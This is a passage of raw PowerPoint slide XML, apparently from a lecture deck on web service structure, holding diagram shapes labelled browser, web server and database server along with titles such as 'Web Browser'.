                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="703262" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="703262" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136650" y="1746250"/>
            <a:ext cx="2120900" cy="1593850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="2540" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1089025">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Title 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9420A1C4-1349-B748-B1AF-EB81C58A7D14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Structure of Web Service</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630DB6-CDC6-F249-8A83-AC7098E0A671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Web Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A543AB0-49DA-F749-AA68-955AACDEA25F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for accessing websites</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BC56F3-471A-214E-8250-DA04D394B7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7200" y="2133601"/>
            <a:ext cx="6705599" cy="4559299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B870D308-F9F7-9142-AA9F-86B0B6634DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5868988"/>
            <a:ext cx="9144000" cy="1046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17" tIns="60958" rIns="121917" bIns="60958">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r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/alrra/browser-logos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5253397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6019800" y="1752600"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4445" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3550" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="835660" marR="828040" indent="-635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web  server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="4953000"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4445" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3550">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="835660" marR="650875" indent="-177165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Database  server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="3505200"/>
            <a:ext cx="0" cy="1447800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1447800">
                <a:moveTo>
                  <a:pt x="0" y="1447799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8284822" y="3447565"/>
            <a:ext cx="42545" cy="57785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545" h="57785">
                <a:moveTo>
                  <a:pt x="41954" y="57633"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="57633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20977" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41954" y="57633"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8284822" y="3447565"/>
            <a:ext cx="42545" cy="57785"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545" h="57785">
                <a:moveTo>
                  <a:pt x="41954" y="57633"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20977" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="57633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41954" y="57633"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8031559" y="4434286"/>
            <a:ext cx="121920" cy="121920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="121920" h="121920">
                <a:moveTo>
                  <a:pt x="0" y="121840"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="24367" y="24367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="121840"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CBCBCB"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="3581401"/>
            <a:ext cx="2514600" cy="974725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2514600" h="974725">
                <a:moveTo>
                  <a:pt x="2392759" y="974724"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2417127" y="877252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514599" y="852884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2392759" y="974724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="974724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514599" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514599" y="852884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736158" y="3709775"/>
            <a:ext cx="2316480" cy="575945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="10795" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="509905">
              <a:lnSpc>
                <a:spcPct val="100699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Custom data  corresponding to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>x &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093740" y="1703340"/>
            <a:ext cx="2260600" cy="1733550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1752600"/>
            <a:ext cx="2108199" cy="1581149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2514600"/>
            <a:ext cx="703580" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="703580" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="703262" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="703262" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136650" y="1746250"/>
            <a:ext cx="2120900" cy="1593850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="2540" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1089025">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E129BEF-B155-C74B-8FC7-D3D2A2C87251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Structure of Web Service</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6019800" y="1752600"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4445" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3550" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="835660" marR="828040" indent="-635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web  server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448050" y="3124200"/>
            <a:ext cx="2571750" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2571750">
                <a:moveTo>
                  <a:pt x="2571749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="15874">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368070" y="3090041"/>
            <a:ext cx="87917" cy="68317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706814" y="3215642"/>
            <a:ext cx="1714500" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web page</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>built</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
